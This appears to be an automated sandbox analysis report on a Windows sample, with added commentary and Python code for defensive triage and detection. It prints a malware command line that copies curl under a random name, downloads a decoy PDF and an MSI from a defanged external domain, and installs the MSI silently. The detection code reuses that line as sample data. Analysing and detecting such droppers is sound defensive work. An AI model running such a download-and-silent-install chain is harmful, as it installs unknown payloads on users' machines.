Windows Analysis Report

Overview

General Information

Analysis ID: 1528042

Detection

Score: 8
Range: 0 - 100
Whitelisted: false
Confidence: 40%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E4F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash, 3_2_00E4F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 3_2_00E4F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 3_2_00E46400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 3_2_00E4EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E46591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 3_2_00E4C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 3_2_00E43EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E4C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C730 CryptHashData, 3_2_00E4C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: -----BEGIN PUBLIC KEY----- 3_2_00E277F7
Source: TNheBOJElq.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Source: unknown DNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1D8C0 recv,WSAGetLastError, 3_2_00E1D8C0
Source: TNheBOJElq.exe String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.dr String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
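Every string in this group, together with the curl.pdb debug record above, says that the dropped TNheBOJElq.exe is curl itself, which is exactly what the `copy c:\windows\system32\curl.exe TNheBOJElq.exe` in the command line further down produces. That also accounts for most of the code-level signatures: the CryptoAPI and Cert* call sequences are consistent with curl's Schannel TLS backend and its WinCrypt-based hashing and random-number code, the bind/listen functions with FTP active-mode (PORT) support and curl's Windows socketpair emulation, and the IsDebuggerPresent/SetUnhandledExceptionFilter and cpuid sequences with ordinary MSVC runtime start-up and failure handling. Those are interpretations of the listed API sequences, not statements the report makes. The quick way to settle it on a host is to hash the dropped file against C:\Windows\System32\curl.exe: if the hashes match, the binary needs no further analysis and attention belongs on the command line and the download URLs; if they differ, it is not a plain copy and does. The Python below is an added example, not part of the report or of any tool it names: it extracts PDB names from RSDS CodeView records by scanning raw bytes (so it also works on the memory dumps the report references), checks for the curl marker strings the report lists, and compares SHA-256 hashes. The sample image is a constructed byte blob with a made-up GUID, not a real PE.

```python
from __future__ import annotations

import hashlib
import re
import struct
import sys
import uuid

# Marker strings taken from the report's string listing; a real table would cover more tools.
TOOL_MARKERS = {
    "curl": (b"Usage: curl [options...] <url>", b"https://curl.se/", b"curl.pdb"),
}


def codeview_records(data: bytes) -> list[tuple[str, int, str]]:
    """Return (guid, age, pdb_path) for each RSDS CodeView record found in the bytes.
    Record layout: 'RSDS' | 16-byte GUID (little-endian) | u32 age | NUL-terminated path.
    Raw scanning rather than walking the PE debug directory keeps this usable on
    memory dumps and on images whose headers are damaged."""
    records = []
    for m in re.finditer(b"RSDS", data):
        start = m.end()
        if start + 20 > len(data):
            break
        guid = uuid.UUID(bytes_le=data[start:start + 16])
        (age,) = struct.unpack("<I", data[start + 16:start + 20])
        end = data.find(b"\0", start + 20)
        if end == -1:
            continue
        try:
            path = data[start + 20:end].decode("utf-8")
        except UnicodeDecodeError:
            continue
        if path.lower().endswith(".pdb") and path.isprintable():  # drop random 'RSDS' hits
            records.append((str(guid), age, path))
    return records


def identify_tool(data: bytes) -> dict[str, list[str]]:
    """Map tool name -> marker strings present, for every tool with at least one hit."""
    hits = {}
    for tool, markers in TOOL_MARKERS.items():
        found = [m.decode() for m in markers if m in data]
        if found:
            hits[tool] = found
    return hits


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage(candidate: bytes, system_copy: bytes | None = None) -> dict:
    """Summarise what the bytes are and whether they equal the trusted system copy."""
    return {
        "sha256": sha256(candidate),
        "pdb": [path for _, _, path in codeview_records(candidate)],
        "tool": identify_tool(candidate),
        "identical_to_system_copy": None if system_copy is None
        else sha256(candidate) == sha256(system_copy),
    }


# Constructed stand-in for the dropped file: not a real PE, just the byte patterns the
# functions above look for. The GUID is made up.
FAKE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_IMAGE = (
    b"MZ" + b"\0" * 62
    + b"Usage: curl [options...] <url>\0"
    + b"https://curl.se/docs/sslcerts.html\0"
    + b"RSDS" + FAKE_GUID.bytes_le + struct.pack("<I", 1) + b"curl.pdb\0"
    + b"\0" * 16
)

if __name__ == "__main__":
    # On a host: python triage.py <dropped file> C:\Windows\System32\curl.exe
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as g:
            print(triage(f.read(), g.read()))
    else:
        print(triage(SAMPLE_IMAGE, SAMPLE_IMAGE))
```

The hash comparison is the decisive check; the PDB name and marker strings are there for the case where only a memory dump or a partial file is available, and they should be read as "looks like curl", not "is the system curl".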
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E11535 3_2_00E11535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E3A8D8 3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E2C1FD 3_2_00E2C1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1A9B3 3_2_00E1A9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E0E127 3_2_00E0E127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1FAEC 3_2_00E1FAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4CAA0 3_2_00E4CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E533B0 3_2_00E533B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E14415 3_2_00E14415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E225B8 3_2_00E225B8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E12564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1D632 appears 245 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E120E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1D6AD appears 301 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E0913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1251E appears 48 times
Source: classification engine Classification label: clean8.win@11/3@1/0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 3_2_00E0310D
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
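The process tree above is the whole story of this sample: stock curl.exe is copied out of System32 under a random name, the copy fetches a decoy PDF and an MSI from dbs5.pwods.com, the PDF is invoked so its registered viewer opens it, and msiexec installs the MSI with /qn (no UI). Two details in the tree are worth reading carefully. First, the inner `"C:\Windows\System32\cmd.exe" /c cd /d "C:\"` is started as its own process and exits immediately, so the `cd` never affects the outer cmd.exe; that is why the renamed curl is created in the directory the command was launched from (C:\Program Files (x86)\AutoIt3\, per the file-created entry above) and why the relative MSI path resolves there too. Second, the low score (clean8) reflects only what the sandbox could observe: an unmodified curl binary whose downloads never completed, since the report records no contacted IPs and flags the domain resolution as failed. The indicator here is the command line, not the file. The Python below is an added example and not part of the sandbox report or of any product it names: it runs four rules over constructed process-creation events (Sysmon Event ID 1 style fields; the PIDs and the benign control event are made up) modelled on the command lines above, then correlates a download by a renamed curl with a silent msiexec install under the same parent, which is the combination that separates this chain from ordinary curl or msiexec use.

```python
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
EXECUTABLE_EXT = {".exe", ".msi", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr"}
QUIET_SWITCHES = {"/q", "/qn", "/quiet", "-q", "-qn", "-quiet"}


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (or Security 4688) fields the rules below use."""
    pid: int
    parent_pid: int
    image: str              # on-disk path of the created process
    cmdline: str
    original_filename: str  # PE version-resource OriginalFileName, as Sysmon records it

def _low(path: str) -> str:
    return path.replace("/", "\\").lower()

def _args(cmdline: str) -> list[str]:
    """Minimal tokenizer: double-quoted strings or whitespace-separated words."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def copied_out_of_system_dir(cmdline: str) -> list[tuple[str, str]]:
    """(src, dst) where a system binary is copied under a different name (the Sigma hit above)."""
    hits = []
    for m in re.finditer(r'\b(?:copy|xcopy)\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)', cmdline, re.I):
        src, dst = _low(m.group(1).strip('"')), _low(m.group(2).strip('"'))
        if src.startswith(SYSTEM_DIRS) and ntpath.basename(src) != ntpath.basename(dst):
            hits.append((src, dst))
    return hits

def renamed_tool(ev: ProcEvent) -> tuple[str, str] | None:
    """OriginalFileName disagrees with the on-disk name: a renamed system utility."""
    on_disk = ntpath.basename(_low(ev.image))
    if ev.original_filename and on_disk != ev.original_filename.lower():
        return ev.original_filename.lower(), on_disk
    return None

def download_to_executable(ev: ProcEvent) -> tuple[str, str] | None:
    """curl, whatever its on-disk name, writing an executable or installer: -o <file> <url>."""
    if ev.original_filename.lower() != "curl.exe":
        return None
    toks, out, url = _args(ev.cmdline), None, None
    for i, t in enumerate(toks):
        if t in ("-o", "--output") and i + 1 < len(toks):
            out = toks[i + 1]
        elif re.match(r"(?i)(?:hxxps?|https?)://", t):  # hxxp accepted so defanged report text replays
            url = t
    if out and url and ntpath.splitext(out)[1].lower() in EXECUTABLE_EXT:
        return out, url
    return None

def silent_msi_install(ev: ProcEvent) -> str | None:
    """msiexec /i <package> combined with a no-UI switch; returns the package name."""
    if ntpath.basename(_low(ev.image)) != "msiexec.exe":
        return None
    toks = [t.lower() for t in _args(ev.cmdline)]
    pkg = next((toks[i + 1] for i, t in enumerate(toks)
                if t in ("/i", "-i", "/package") and i + 1 < len(toks)), None)
    return pkg if pkg and any(t in QUIET_SWITCHES for t in toks) else None

def analyze(events: list[ProcEvent]) -> dict[str, list]:
    """Run the per-event rules, then correlate download -> silent install under one parent."""
    f: dict[str, list] = {k: [] for k in ("copy_from_system_dir", "renamed_tool",
                                          "download_executable", "silent_msi", "chain")}
    downloaded_under: dict[int, set[str]] = {}  # parent pid -> basenames curl wrote
    for ev in events:
        f["copy_from_system_dir"] += copied_out_of_system_dir(ev.cmdline)
        if (r := renamed_tool(ev)):
            f["renamed_tool"].append(r)
        if (d := download_to_executable(ev)):
            f["download_executable"].append(d)
            downloaded_under.setdefault(ev.parent_pid, set()).add(ntpath.basename(_low(d[0])))
        if (pkg := silent_msi_install(ev)):
            f["silent_msi"].append(pkg)
            if ntpath.basename(pkg) in downloaded_under.get(ev.parent_pid, set()):
                f["chain"].append((ev.parent_pid, pkg))
    return f

# Constructed events mirroring the report's process tree; PIDs are made up and the
# last event is a benign control (plain curl fetching JSON) that is not in the report.
CHAIN = ('cmd /C ""C:\\Windows\\System32\\cmd.exe" /c cd /d "C:\\" & copy c:\\windows\\system32\\curl.exe'
         ' TNheBOJElq.exe & TNheBOJElq.exe -o "C:\\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf'
         ' & "C:\\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent'
         ' & C:\\Windows\\System32\\msiexec.exe /i bLhLldebqq.msi /qn"')
RENAMED = r"C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\SysWOW64\cmd.exe", CHAIN, "Cmd.Exe"),
    ProcEvent(2, 1, RENAMED, 'TNheBOJElq.exe -o "C:\\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf', "curl.exe"),
    ProcEvent(3, 1, RENAMED, "TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent", "curl.exe"),
    ProcEvent(4, 1, r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn", "msiexec.exe"),
    ProcEvent(5, 0, r"C:\Windows\System32\curl.exe", "curl.exe -o report.json https://intranet.example/api", "curl.exe"),
]
```

Calling `analyze(SAMPLE_EVENTS)` flags the copy, both renamed-curl executions, the MSI download, the quiet install, and the correlated chain, while the control event produces nothing. The `renamed_tool` rule depends on OriginalFileName being logged, so it needs Sysmon or an EDR that records version-resource data; the other three work on plain 4688 command lines.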
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_00E1D33A
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe API coverage: 3.3 %
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00E5155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00E50CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E516BE SetUnhandledExceptionFilter, 3_2_00E516BE
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E5137A cpuid 3_2_00E5137A
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_00E51775
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 3_2_00E4699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 3_2_00E38490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 3_2_00E1DEDF
No contacted IP infos